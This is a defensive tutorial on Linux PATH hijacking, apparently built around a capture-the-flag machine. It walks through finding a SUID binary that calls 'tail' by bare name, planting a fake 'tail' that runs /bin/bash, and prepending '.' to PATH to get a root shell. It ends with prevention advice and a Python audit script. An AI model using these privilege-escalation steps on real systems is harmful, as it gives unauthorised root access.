How to avoid Path hijacking attack
Path hijacking is a type of attack where an attacker places a malicious executable in a location that is searched before the legitimate executable. This guide will show you how to identify vulnerabilities and protect against path hijacking attacks.
Enumerate SUID Permissions
Files with the SUID (Set User ID) permission can be exploited if not managed properly. Use the following commands to find files with SUID and SGID (Set Group ID) permissions:
# Find files with SUID permission
find / -perm -u=s -type f 2>/dev/null
# Find files with SGID permission
find / -perm -g=s -type f 2>/dev/null
You can also use enumeration scripts such as lse.sh for a more comprehensive scan: https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh
Identify SUID Vulnerabilities
Check directories and files for SUID permissions. For example, listing the contents of a user's home directory:
ls -la /home/joe/
Output:
barry@mustacchio:~$ ls -la /home/joe/
total 28
drwxr-xr-x 2 joe joe 4096 Jun 12 15:48 .
drwxr-xr-x 4 root root 4096 Jun 12 15:48 ..
-rwsr-xr-x 1 root root 16832 Jun 12 15:48 live_log
In this example, live_log has the SUID permission set, indicating a potential vulnerability.
Search Inside Binary Files
When dealing with binary files, use the strings utility to extract and inspect the readable text they embed. This can help identify which commands or programs the binary calls:
strings /home/joe/live_log
Output:
The output shows that the live_log program invokes tail by its bare name rather than by an absolute path, so the shell resolves it through PATH.
Perform a Hijacking Attack
To perform a path hijacking attack, create a fake executable in a directory that is searched before the legitimate one. Here is how. First, create a file named tail in /tmp containing /bin/bash:
cd /tmp
echo "/bin/bash" > tail
chmod +x tail
Modify the PATH environment variable to include the current directory (.) before the system paths:
PATH=.:$PATH
Execute the vulnerable program:
/home/joe/live_log
If the program runs the planted tail script instead of the real one, the shell it spawns inherits the binary's root privileges.
Preventing Path Hijacking Attacks
To prevent path hijacking attacks, do not rely on the PATH environment variable to locate executables in scripts or binaries; the caller's environment, PATH included, is passed to a SUID program unchanged. Use absolute paths instead. For example:
# Instead of using just the command
tail /var/log/syslog
# Use the absolute path to the command
/usr/bin/tail /var/log/syslog
Additional Security Practices
- Restrict SUID/SGID Binaries: Limit the use of SUID and SGID binaries to only those absolutely necessary.
- Environment Sanitization: Ensure that privileged scripts and binaries reset environment variables such as PATH to known-good values before executing other programs.
- System Audits: Regularly audit your system for unexpected SUID/SGID binaries and unusual environment variable settings.
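As an added defender-side example (not part of the original guide), the following Python audit script walks a directory tree for SUID/SGID files and flags embedded command strings that name common utilities without an absolute path, the pattern that made live_log hijackable. The WATCHED list and the constructed SAMPLE_BINARY bytes are assumptions for illustration.

```python
import os
import re
import stat
import sys

# Utilities commonly invoked by wrapper binaries; a bare name here is resolved through PATH.
WATCHED = {"tail", "cat", "ls", "ps", "cp", "mv", "rm", "sh", "bash", "grep", "awk", "sed"}
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")  # roughly what strings(1) would print
BARE_COMMAND = re.compile(r"^\s*([A-Za-z0-9_.-]+)(?:\s|$)")  # first word, no leading slash


def relative_commands(data: bytes) -> set[str]:
    """Watched utilities that a binary names as a bare command word (PATH lookup)."""
    found = set()
    for m in PRINTABLE_RUN.finditer(data):
        text = m.group().decode("ascii")
        for segment in text.split(";"):  # also catches "cmd1; cmd2" inside one system() string
            word = BARE_COMMAND.match(segment)
            if word and word.group(1) in WATCHED:
                found.add(word.group(1))
    return found


def is_setid(path: str) -> bool:
    st = os.lstat(path)  # do not follow symlinks
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & (stat.S_ISUID | stat.S_ISGID))


def audit(root: str) -> dict[str, set[str]]:
    """Map each set-id regular file under root to the bare commands it embeds."""
    findings = {}
    for dirpath, _, files in os.walk(root, onerror=lambda _e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                if not is_setid(path):
                    continue
                with open(path, "rb") as fh:
                    commands = relative_commands(fh.read())
            except OSError:
                continue  # unreadable or vanished; skip it
            if commands:
                findings[path] = commands
    return findings


# Constructed sample (assumption): strings a live_log-style wrapper might contain.
SAMPLE_BINARY = (b"\x7fELF\x02\x01\x01" + b"\x00" * 16 + b"tail -f /var/log/nginx/access.log\x00"
                 + b"/usr/bin/cat /etc/motd\x00" + b"GLIBC_2.2.5\x00")

if __name__ == "__main__":
    for path, commands in audit(sys.argv[1] if len(sys.argv) > 1 else "/").items():
        print(f"{path}: invokes {sorted(commands)} via PATH lookup")
```

Run it as root over / (or a narrower tree such as /usr/local or /home) and review every hit; a bare command name inside a set-id binary is a finding to fix with an absolute path, not proof of exploitability on its own.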